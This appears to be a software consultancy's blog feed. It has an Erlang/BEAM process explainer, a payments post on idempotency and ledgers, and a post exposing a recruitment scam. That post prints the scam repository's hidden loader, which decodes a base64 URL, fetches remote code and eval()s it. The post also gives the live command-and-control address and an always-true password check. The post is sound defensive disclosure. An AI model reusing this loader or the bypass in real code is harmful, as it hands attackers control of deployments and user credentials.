can look inside. Not even the supervisor.&lt;/p&gt;
&lt;p&gt;This is the BEAM’s per-process heap. Every gnome allocates, grows, and
cleans up its own memory. When garbage collection happens, it pauses only
that gnome. The rest of the village keeps working, blissfully unaware that
one of them is reorganizing its backpack.&lt;/p&gt;
&lt;p&gt;You can think of this as enforced politeness. No one borrows another
gnome’s tools. If two workers need the same scroll, they each get their own
copy. That sounds wasteful until you remember that arguments over shared
tools are slower than copying a small one.&lt;/p&gt;
&lt;p&gt;When the backpack gets full, the gnome quietly expands it. If it has been
hoarding junk, it throws some away. No one else stops to help. That’s why
the village scales.&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gc.jpg&quot; alt=&quot;Gnome Backpack&quot; title=&quot;Gnome Backpack - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;p&gt;This model feels strange at first, especially to programmers used to shared
memory and global variables. But once you stop reaching into other people’s
backpacks, your code becomes simpler. You no longer need locks, guards, or
faith. Just messages.&lt;/p&gt;
&lt;h2 id=&quot;mail-not-shared-drawers&quot; tabindex=&quot;-1&quot;&gt;Mail, Not Shared Drawers&lt;/h2&gt;
&lt;p&gt;When gnomes need to cooperate, they don’t shout across the room or share
drawers full of half-finished work. They send each other small, clear
messages, paper mail.&lt;/p&gt;
&lt;p&gt;Each gnome has a mailbox. Messages arrive, stack up, and wait patiently
until the gnome decides to read them. This small act of patience is what
makes the village stable. No one interrupts anyone else. No one rummages
through shared memory “just to check something.”&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/mailbox.jpg&quot; alt=&quot;Gnome Mailboxes&quot; title=&quot;Gnome Mailboxes - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;p&gt;When a message moves from one gnome to another, the BEAM copies it between
their heaps. This sounds expensive until you compare it with the cost of
arguing over shared state. Copying is linear, but contention is chaos. The
BEAM avoids chaos.&lt;/p&gt;
&lt;p&gt;Large binaries, like scrolls of long text or files of runes, are handled by
reference so they don’t have to be copied every time. Small messages are
cheap to copy. Either way, the rules stay consistent, ownership and
lifetime are always clear.&lt;/p&gt;
&lt;p&gt;The mailbox also tells the truth about your system. If a gnome falls
behind, its mailbox grows. You don’t need metrics to know where the
bottleneck is; you can see it directly. It’s a polite form of backpressure.
Instead of crashing everything, the system simply queues up.&lt;/p&gt;
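&lt;p&gt;The whole exchange, hiring a gnome, dropping mail in its box, and waiting for a reply, fits in a few lines. A sketch with illustrative module and message names:&lt;/p&gt;

```erlang
%% One gnome mails another; module and message shapes are illustrative.
-module(mailbox_demo).
-export([run/0]).

run() ->
    Parent = self(),
    %% Hire a gnome that waits for one letter, then answers.
    Gnome = spawn(fun() ->
                receive
                    {letter, From, Text} ->
                        From ! {reply, string:uppercase(Text)}
                end
            end),
    Gnome ! {letter, Parent, "hello village"},  %% drop mail in its box
    receive
        {reply, Answer} -> Answer
    after 1000 ->
        timeout
    end.
```

&lt;p&gt;Nothing is shared: the letter is copied into the gnome&#39;s heap, and the reply is copied back.&lt;/p&gt;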
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;li&gt;Sending mail = Message&lt;/li&gt;
&lt;li&gt;Mailbox = Message Queue&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;h2 id=&quot;shared-scrolls&quot; tabindex=&quot;-1&quot;&gt;Shared Scrolls&lt;/h2&gt;
&lt;p&gt;Every gnome reads from the same shelf of scrolls. Code lives there, one
copy, many readers. It’s the shared library of behavior that keeps the
village running. Each gnome brings its own data, but they all follow the
same instructions.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/shared_code.jpg&quot; alt=&quot;Shelf of scrolls&quot; title=&quot;Shelf of scrolls - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;p&gt;In object-oriented systems, code and data are fused by design. The class
describes both structure and behavior, and when you instantiate it, the two
merge into an object, a miniature machine built from its own blueprint.
Every instance is a private copy of the same idea, and the boundary between
code and state fades away.&lt;/p&gt;
&lt;p&gt;That tight coupling shapes how you think. You start assembling systems as
machines of machines, each with its own logic and data intertwined.
Changing one part often means stopping the whole contraption.&lt;/p&gt;
&lt;p&gt;The BEAM model avoids this entirely. Code and state are separate species.
Modules define domains of logic, the scrolls on the shelf. Processes are
independent actors, the gnomes who read those scrolls. You can have
thousands of workers all using the same code without binding their identity
to it.&lt;/p&gt;
&lt;p&gt;You can start, stop, or upgrade gnomes without touching the
scrolls they read. And you can update a scroll without restarting the
village. New gnomes pick up the latest version; old ones finish their work
with the version they began with, or
get the new one as needed.&lt;/p&gt;
&lt;p&gt;In the machine world, rewiring is dangerous. In the gnome village, you just
swap a scroll on the shelf. The old one stays until no one needs it. The
new one takes over quietly. The system keeps humming.&lt;/p&gt;
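&lt;p&gt;The mechanism behind the scroll swap is visible in an ordinary receive loop. A sketch, with illustrative names: a fully qualified call (&lt;code&gt;?MODULE:loop/1&lt;/code&gt;) jumps to the newest loaded version of the module, while a plain local call keeps running the version it started with.&lt;/p&gt;

```erlang
%% A gnome that can pick up the newest scroll on request.
-module(scroll_reader).
-export([start/0, loop/1]).

start() -> spawn(?MODULE, loop, [#{}]).

loop(State) ->
    receive
        upgrade ->
            %% Fully qualified call: continues in the latest loaded version.
            ?MODULE:loop(State);
        {set, Key, Value} ->
            %% Local call: stays in the currently running version.
            loop(State#{Key => Value})
    end.
```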
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;li&gt;Sending mail = Message&lt;/li&gt;
&lt;li&gt;Mailbox = Message Queue&lt;/li&gt;
&lt;li&gt;Scroll = Module Code&lt;/li&gt;
&lt;li&gt;Shelf of Scrolls = Code Server / Loaded Modules&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;h2 id=&quot;hiring-new-gnomes&quot; tabindex=&quot;-1&quot;&gt;Hiring New Gnomes&lt;/h2&gt;
&lt;p&gt;When the village grows, you hire new gnomes.
Each gnome starts empty-handed, carrying only its backpack and a reference
to the scrolls on the shelf. That’s what spawning a process means.&lt;/p&gt;
&lt;p&gt;In most runtimes, starting a new worker is a serious commitment. You create
a thread, allocate stacks, and share memory that everyone must coordinate
around. On the BEAM, it’s casual.&lt;/p&gt;
&lt;p&gt;Because every gnome owns its own memory, you never worry about who cleans
up what. Each process manages its own heap, collects its own garbage, and
dies without ceremony. The village keeps going. This is why Erlang systems
routinely handle millions of concurrent activities, not by being powerful,
but by being polite.&lt;/p&gt;
&lt;p&gt;The most important part is psychological. When concurrency is cheap, you
stop trying to multiplex tasks inside one worker. Instead of building a
complex machine that does everything, you build a community of simple ones
that each do one thing well.&lt;/p&gt;
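&lt;p&gt;How casual is hiring? A sketch that hires ten thousand gnomes, each doing one tiny job and reporting back (the count and names are arbitrary):&lt;/p&gt;

```erlang
%% Spawn N short-lived processes and wait for all of them.
-module(hiring_demo).
-export([run/1]).

run(N) ->
    Parent = self(),
    lists:foreach(fun(I) ->
                      spawn(fun() -> Parent ! {done, I} end)
                  end,
                  lists:seq(1, N)),
    collect(N).

collect(0) -> ok;
collect(N) ->
    receive
        {done, _} -> collect(N - 1)
    end.
```

&lt;p&gt;Calling &lt;code&gt;hiring_demo:run(10000)&lt;/code&gt; completes in a blink; each process costs a few hundred words of memory and microseconds to start.&lt;/p&gt;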
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;li&gt;Sending mail = Message&lt;/li&gt;
&lt;li&gt;Mailbox = Message Queue&lt;/li&gt;
&lt;li&gt;Scroll = Module Code&lt;/li&gt;
&lt;li&gt;Shelf of Scrolls = Code Server / Loaded Modules&lt;/li&gt;
&lt;li&gt;Hiring a gnome = Spawn&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;h2 id=&quot;fair-turns-at-the-workbench&quot; tabindex=&quot;-1&quot;&gt;Fair Turns at the Workbench&lt;/h2&gt;
&lt;p&gt;Every gnome needs time at the workbench, the place where real work
happens. This is where messages are handled, state is updated, and progress
is made. The workbench is a shared resource, but it never turns into a
battlefield.&lt;/p&gt;
&lt;p&gt;Gnomes don’t fight for the bench. They queue. Each gets a short turn, does
its work, and steps aside. The rhythm is steady, predictable, and fair.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/scheduler.jpg&quot; alt=&quot;Queue of gnomes waiting for workbench turns&quot; title=&quot;Queue
of gnomes waiting for workbench turns - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Each workbench corresponds to a scheduler, one per CPU core. Every gnome
waiting in line gets a slice of attention, measured not in time but in
reductions. A reduction is roughly one function call or a small operation.
After a few thousand of them, the gnome yields. The next one steps forward.
This happens in microseconds.&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;li&gt;Sending mail = Message&lt;/li&gt;
&lt;li&gt;Mailbox = Message Queue&lt;/li&gt;
&lt;li&gt;Scroll = Module Code&lt;/li&gt;
&lt;li&gt;Shelf of Scrolls = Code Server / Loaded Modules&lt;/li&gt;
&lt;li&gt;Hiring a gnome = Spawn&lt;/li&gt;
&lt;li&gt;Workbench = Scheduler&lt;/li&gt;
&lt;li&gt;Queue of Gnomes = Run Queue&lt;/li&gt;
&lt;li&gt;Turn = Time Slice (measured in reductions)&lt;/li&gt;
&lt;li&gt;Yielding = Process Preemption&lt;/li&gt;
&lt;li&gt;Village = BEAM Node&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;p&gt;Because of this reduction-based scheduling, no single gnome can monopolize
the workbench. Long tasks get paused and resumed without blocking others. Even a
slow worker can’t freeze the village. Everyone makes progress.&lt;/p&gt;
&lt;p&gt;In the machine world, it’s different. A thread grabs a lock, works for too
long, and everyone else waits. Latency spikes. Throughput drops.&lt;/p&gt;
&lt;p&gt;Thousands of gnomes can take turns without noticing each other’s existence.
This is what makes BEAM suitable for soft real-time systems: predictable
responsiveness without explicit scheduling logic.&lt;/p&gt;
&lt;h2 id=&quot;failure-is-contained&quot; tabindex=&quot;-1&quot;&gt;Failure Is Contained&lt;/h2&gt;
&lt;p&gt;Gnomes are independent workers. Each one carries its own tools, keeps its
own memory, and makes its own mistakes.
Even if they die, no other gnomes are
affected.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_2.jpg&quot; alt=&quot;One bench with spilled sandwich, other benches fine&quot; title=&quot;One bench with spilled sandwich, other benches fine - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;li&gt;Sending mail = Message&lt;/li&gt;
&lt;li&gt;Mailbox = Message Queue&lt;/li&gt;
&lt;li&gt;Scroll = Module Code&lt;/li&gt;
&lt;li&gt;Shelf of Scrolls = Code Server&lt;/li&gt;
&lt;li&gt;Hiring a gnome = Spawn&lt;/li&gt;
&lt;li&gt;Workbench = Scheduler&lt;/li&gt;
&lt;li&gt;Queue of Gnomes = Run Queue&lt;/li&gt;
&lt;li&gt;Turn = Time Slice&lt;/li&gt;
&lt;li&gt;Yielding = Process Preemption&lt;/li&gt;
&lt;li&gt;Village = BEAM Node&lt;/li&gt;
&lt;li&gt;Autonomy = Isolation&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;p&gt;In the machine world, it’s different. Parts are connected through shared
cogs and gears. An exception in one component rattles through the entire
mechanism. Shared state becomes corrupted, threads that touch it misbehave,
and soon everything needs a restart.&lt;/p&gt;
&lt;p&gt;You try to protect against it. You validate inputs, wrap code in try-catch
blocks, check state, recheck it, and still miss something. Complexity
grows. Safety doesn’t.&lt;/p&gt;
&lt;p&gt;BEAM systems take a simpler path: let it crash. Bad data? Faulty logic? Let
the gnome fall, clean the bench, and start fresh.&lt;/p&gt;
&lt;p&gt;Isolation contains damage. Sharing spreads it. The village survives because
every gnome stands, and occasionally falls, alone.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The gnome is the unit of work, state, and failure. Keep it small. Give it
one job. Let it talk in messages. Supervise it. This is the simplest way I
know to build software that stays up when real life happens.&lt;/p&gt;
&lt;p&gt;For a deeper look at how the BEAM implements processes, heaps, message
passing, scheduling, and garbage collection under the hood, see
&lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Exposing the &#39;Multibank Crypto Poker&#39; Recruitment Scam</title>
    <link href="https://happihacking.com/blog/posts/2025/recruitment_scam/"/>
    <updated>2025-08-20T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/recruitment_scam/</id>
    <summary>If it looks too good to be true, it is</summary>
    <content type="html">&lt;h1 id=&quot;tldr&quot; tabindex=&quot;-1&quot;&gt;TL;DR&lt;/h1&gt;
&lt;p&gt;Fake recruiters are pushing a malicious “crypto poker” codebase.
It contains remote code execution, broken authentication, and wallet harvesting.
If you’re asked to deploy it as part of a job test: it’s a scam.&lt;/p&gt;
&lt;h1 id=&quot;the-discovery&quot; tabindex=&quot;-1&quot;&gt;The Discovery&lt;/h1&gt;
&lt;p&gt;I was recently offered a “blockchain gaming” job with a suspiciously high salary.
The technical assessment included a codebase called &lt;em&gt;Multibank Crypto Poker&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;A quick inspection revealed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It isn’t a product.&lt;/li&gt;
&lt;li&gt;It isn’t a test.&lt;/li&gt;
&lt;li&gt;It’s a trap.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;the-scam-infrastructure&quot; tabindex=&quot;-1&quot;&gt;The Scam Infrastructure&lt;/h1&gt;
&lt;p&gt;The repository presents itself as a polished poker platform, supposedly
linked to MultiBank Group, a real financial company. Under the surface, it
hides critical malicious code.&lt;/p&gt;
&lt;h2 id=&quot;1-remote-code-execution&quot; tabindex=&quot;-1&quot;&gt;1. Remote Code Execution&lt;/h2&gt;
&lt;p&gt;The most critical vulnerability is in &lt;code&gt;/routes/api/auth.js&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-js&quot;&gt;(async () =&amp;gt; {
    const src = atob(process.env.AUTH_API_KEY);
    const proxy = (await import(&#39;node-fetch&#39;)).default;
    try {
        const response = await proxy(src);
        if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`);
        const proxyInfo = await response.text();
        eval(proxyInfo);  // CRITICAL: Executes arbitrary code!
    } catch (err) {
        console.error(&#39;Auth Error!&#39;, err);
    }
})();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This automatically fetches code from a remote server and executes it. Whoever controls that server
controls your deployment.&lt;/p&gt;
&lt;h3 id=&quot;the-command-control-infrastructure&quot; tabindex=&quot;-1&quot;&gt;The Command &amp;amp; Control Infrastructure&lt;/h3&gt;
&lt;p&gt;The backdoor connects to: https://multibank-api-ten.vercel.app/api/data&lt;/p&gt;
&lt;p&gt;This URL is base64-encoded in the environment variable:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;AUTH_API_KEY = &amp;quot;aHR0cHM6Ly9tdWx0aWJhbmstYXBpLXRlbi52ZXJjZWwuYXBwL2FwaS9kYXRh&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The attack sequence:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Decodes the base64 string using atob(process.env.AUTH_API_KEY)&lt;/li&gt;
&lt;li&gt;Fetches whatever code is hosted at that Vercel endpoint&lt;/li&gt;
&lt;li&gt;Executes it using eval()&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This design allows attackers to change payloads dynamically without
touching the GitHub repository. Different victims could receive different
malicious code based on timing, IP address, or other factors.&lt;/p&gt;
&lt;h3 id=&quot;reporting-the-infrastructure&quot; tabindex=&quot;-1&quot;&gt;Reporting the Infrastructure&lt;/h3&gt;
&lt;p&gt;I&#39;ve reported the Vercel endpoint to their abuse team at https://vercel.com/abuse.&lt;/p&gt;
&lt;p&gt;The endpoint was live at time of analysis and could be serving different
payloads to different victims.&lt;/p&gt;
&lt;h2 id=&quot;2-deliberately-broken-authentication&quot; tabindex=&quot;-1&quot;&gt;2. Deliberately Broken Authentication&lt;/h2&gt;
&lt;p&gt;In &lt;code&gt;/controllers/auth.js&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-js&quot;&gt;const isMatch = true;  // Every password works
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Credentials are collected but never verified. Security theater at best, credential harvesting at worst.&lt;/p&gt;
&lt;h2 id=&quot;3-wallet-harvesting&quot; tabindex=&quot;-1&quot;&gt;3. Wallet Harvesting&lt;/h2&gt;
&lt;p&gt;The frontend wallet connection (&lt;code&gt;/client/src/pages/ConnectWallet/ConnectWallet.js&lt;/code&gt;) captures wallet addresses and pushes them to the server.
There is no blockchain logic, no smart contracts, no signing, just collection.&lt;/p&gt;
&lt;h2 id=&quot;4-template-scam-signs&quot; tabindex=&quot;-1&quot;&gt;4. Template Scam Signs&lt;/h2&gt;
&lt;p&gt;Commented-out database code. Suspicious commit history removing comments.
Clear evidence of a recycled scam package.&lt;/p&gt;
&lt;h1 id=&quot;how-the-scam-works&quot; tabindex=&quot;-1&quot;&gt;How the Scam Works&lt;/h1&gt;
&lt;ol&gt;
&lt;li&gt;Recruiters offer inflated salaries.&lt;/li&gt;
&lt;li&gt;Candidates receive this “assessment project.”&lt;/li&gt;
&lt;li&gt;Developers are asked to deploy it. The recruiters even said deployment
was a required step during the interview.&lt;/li&gt;
&lt;li&gt;The code harvests credentials and wallet data.&lt;/li&gt;
&lt;li&gt;The backdoor provides attackers with ongoing control.&lt;/li&gt;
&lt;/ol&gt;
&lt;h1 id=&quot;red-flags&quot; tabindex=&quot;-1&quot;&gt;Red Flags&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;High pay for trivial work.&lt;/li&gt;
&lt;li&gt;Requests to deploy before review.&lt;/li&gt;
&lt;li&gt;“Crypto gaming” without blockchain.&lt;/li&gt;
&lt;li&gt;Shiny README, rotten implementation.&lt;/li&gt;
&lt;li&gt;Recruiters unable to discuss technical details.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;protecting-yourself&quot; tabindex=&quot;-1&quot;&gt;Protecting Yourself&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;Audit all code before running it.&lt;/li&gt;
&lt;li&gt;Search for &lt;code&gt;eval()&lt;/code&gt; and base64 URLs.&lt;/li&gt;
&lt;li&gt;Check authentication logic.&lt;/li&gt;
&lt;li&gt;Verify company links.&lt;/li&gt;
&lt;li&gt;Never deploy code you don’t fully understand.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;taking-action&quot; tabindex=&quot;-1&quot;&gt;Taking Action&lt;/h1&gt;
&lt;p&gt;If you encounter this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Do &lt;strong&gt;not&lt;/strong&gt; run it.&lt;/li&gt;
&lt;li&gt;Report to GitHub abuse and local cybercrime units.&lt;/li&gt;
&lt;li&gt;Document everything.&lt;/li&gt;
&lt;li&gt;Warn your peers.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;technical-indicators&quot; tabindex=&quot;-1&quot;&gt;Technical Indicators&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;eval()&lt;/code&gt; fetching remote code.&lt;/li&gt;
&lt;li&gt;Base64 URLs in environment variables.&lt;/li&gt;
&lt;li&gt;Hardcoded password checks.&lt;/li&gt;
&lt;li&gt;Wallet address collection without blockchain logic.&lt;/li&gt;
&lt;li&gt;Commented-out core services.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;This is a recruitment scam targeting developers. By hiding malware in a
“job test,” attackers hope you will deploy their system and do their work
for them.&lt;/p&gt;
&lt;p&gt;Stay skeptical. If the offer looks too good to be true, and the project
code reads like a security nightmare, trust your instincts: it’s a scam.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Exactly once</title>
    <link href="https://happihacking.com/blog/posts/2025/exacly_once/"/>
    <updated>2025-08-19T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/exacly_once/</id>
    <summary>Exactly once</summary>
    <content type="html">&lt;h1 id=&quot;why-exactly-once-in-payments-is-a-myth-and-what-works-instead&quot; tabindex=&quot;-1&quot;&gt;Why &amp;quot;Exactly Once&amp;quot; in Payments Is a Myth, and What Works Instead&lt;/h1&gt;
&lt;p&gt;Payment systems live with retries. Customers double-click. Networks
misbehave. Providers time out. For most services on the Internet
this is not a big problem, but as soon as money is involved the
stakes are higher.&lt;/p&gt;
&lt;p&gt;&amp;quot;Exactly once processing&amp;quot; sounds like the answer, but in distributed systems it is not achievable.&lt;/p&gt;
&lt;p&gt;As &lt;a href=&quot;https://x.com/mathiasverraes/status/632260618599403520&quot;&gt;Mathias Verraes&lt;/a&gt; joked:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;There are only two hard problems in distributed systems:&lt;/p&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Exactly-once delivery&lt;/li&gt;
&lt;li&gt;Guaranteed order of messages&lt;/li&gt;
&lt;li&gt;Exactly-once delivery&lt;/li&gt;
&lt;/ol&gt;
&lt;/blockquote&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;databases-already-solved-this&quot; tabindex=&quot;-1&quot;&gt;Databases Already Solved This&lt;/h2&gt;
&lt;p&gt;In the 1970s and 80s, relational databases gave us transactions. &lt;code&gt;BEGIN&lt;/code&gt;,
&lt;code&gt;COMMIT&lt;/code&gt;, &lt;code&gt;ROLLBACK&lt;/code&gt;. Two-phase commit across a couple of resources.&lt;/p&gt;
&lt;p&gt;For many business systems this was enough. Inside one database boundary, you could rely on exactly-once semantics and sleep well.&lt;/p&gt;
&lt;p&gt;Databases even solved the two &amp;quot;hard problems&amp;quot; of distributed systems: ordering and exactly-once delivery, by hiding them under the hood. A master node applied every write in order, replicas replayed the log, and the system recovered after crashes. To the developer, it looked simple: every committed transaction happened once, in order. The complexity was real, but it was contained inside the database engine.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;the-world-changed&quot; tabindex=&quot;-1&quot;&gt;The World Changed&lt;/h2&gt;
&lt;p&gt;Modern architectures encourage each microservice to own its database.
A single payment now crosses several services and several persistence layers.&lt;/p&gt;
&lt;p&gt;Two-phase commit across them is brittle, expensive, and slow.
Crashes, retries, and failovers are the norm. The old guarantees don&#39;t reach that far.&lt;/p&gt;
&lt;p&gt;As Gregor Hohpe noted in his classic essay &lt;a href=&quot;https://www.enterpriseintegrationpatterns.com/ramblings/18_starbucks.html&quot;&gt;&lt;em&gt;Starbucks Doesn&#39;t Use Two-Phase Commit&lt;/em&gt;&lt;/a&gt;,
the coffee shop doesn&#39;t lock a global transaction until your latte is ready.
It takes your order, gives you a token, and processes each step independently.
The business process absorbs retries and delays, rather than the infrastructure pretending they cannot happen.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;what-works-today&quot; tabindex=&quot;-1&quot;&gt;What Works Today&lt;/h2&gt;
&lt;p&gt;Instead of promising exactly once, modern systems aim for &lt;strong&gt;at-least-once execution with consistent outcomes&lt;/strong&gt;.
The same request may run multiple times, but the final state is unambiguous.&lt;/p&gt;
&lt;p&gt;The main tools:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Transaction tokens (idempotency keys).&lt;/strong&gt;
Generated at the very start, carried through every call and write.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Idempotent operations.&lt;/strong&gt;
Each subsystem treats &amp;quot;process payment with token X&amp;quot; as a conditional write: succeed once, or return the same result again.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Persistent logs.&lt;/strong&gt;
Append-only records allow reconciliation after crashes.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Event-based systems and message queues.&lt;/strong&gt;
Kafka, RabbitMQ, or SQS provide durability and back-pressure. But they only guarantee at-least-once delivery.
Your handlers still need tokens and idempotency to prevent duplicates.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
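&lt;p&gt;The first two tools combine into one simple pattern: the charge becomes a conditional write keyed by the token. A sketch (Erlang, with an in-memory map standing in for durable storage with a unique-key constraint):&lt;/p&gt;

```erlang
%% Idempotent charge: retrying with the same token returns the
%% original result instead of charging twice. The map stands in
%% for a database supporting a conditional insert.
-module(idempotent_pay).
-export([charge/3]).

charge(Token, Amount, Store) ->
    case maps:find(Token, Store) of
        {ok, Result} ->
            {Result, Store};               %% duplicate: replay the result
        error ->
            Result = {charged, Amount},    %% perform the charge once
            {Result, Store#{Token => Result}}
    end.
```

&lt;p&gt;Running the same token a second time returns the stored result and leaves the store untouched, which is exactly the &amp;quot;succeed once, or return the same result again&amp;quot; contract.&lt;/p&gt;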
&lt;hr /&gt;
&lt;h2 id=&quot;when-security-or-scale-demands-more&quot; tabindex=&quot;-1&quot;&gt;When Security or Scale Demands More&lt;/h2&gt;
&lt;p&gt;For flows that span companies, regulators, or geographies, further
reinforcement helps:&lt;/p&gt;
&lt;h3 id=&quot;ledgers&quot; tabindex=&quot;-1&quot;&gt;Ledgers&lt;/h3&gt;
&lt;p&gt;Append-only histories allow replay, audit, and reconciliation.&lt;/p&gt;
&lt;p&gt;In payments this is more than a log file, it is often &lt;strong&gt;double-entry
bookkeeping&lt;/strong&gt; at the core.
Every debit has a matching credit, and the ledger balances at all times.
Settlement windows (say, end-of-day netting between banks) depend on these
records, as do regulatory audit trails.&lt;/p&gt;
&lt;p&gt;This is not a new idea. As Jim Gray described in his 1978 work on
transaction processing,
databases have always relied on a commit log to guarantee durability and
recoverability.
The log &lt;em&gt;is&lt;/em&gt; the database. What modern ledger systems and blockchains add
is immutability and verifiability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Hash-chained logs.&lt;/strong&gt;
Every entry in the ledger includes a cryptographic hash of the previous entry.
This creates a chain where altering even a single past record changes every hash after it.
The effect is tamper evidence: regulators, auditors, or counterparties can verify that no history has been rewritten.
In payments this is critical for settlement systems where disputes may
arise months later, the hash chain proves the record is intact.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Patricia-Merkle trees.&lt;/strong&gt;
(We implemented these for the aeternity blockchain; see &lt;a href=&quot;https://happihacking.com/blog/posts/2023/blockchain-audit/&quot;&gt;Audits through Merkle Root Hashes&lt;/a&gt; for practical applications.)
These are tree-shaped data structures where each branch node contains the
hash of its children.
They allow you to prove the presence (or absence) of a transaction
without revealing the entire ledger.
For example, a bank can prove to a regulator that a given transfer is
included in the ledger,
or two institutions can reconcile only the subset of accounts they have
in common.
This makes cross-organization settlement and audit feasible without
exchanging full databases.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
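&lt;p&gt;A hash chain is small enough to sketch. The Python below is illustrative, not any particular ledger product: each entry commits to the hash of its predecessor, so editing one historical record invalidates everything after it.&lt;/p&gt;

```python
import hashlib
import json

def entry_hash(prev_hash, record):
    # Hash the previous hash together with a canonical encoding of the record.
    payload = prev_hash + json.dumps(record, sort_keys=True)
    return hashlib.sha256(payload.encode()).hexdigest()

def append(ledger, record):
    prev = ledger[-1]['hash'] if ledger else '0' * 64
    ledger.append({'record': record, 'hash': entry_hash(prev, record)})

def verify(ledger):
    # Recompute every hash from the genesis value; any edit breaks the chain.
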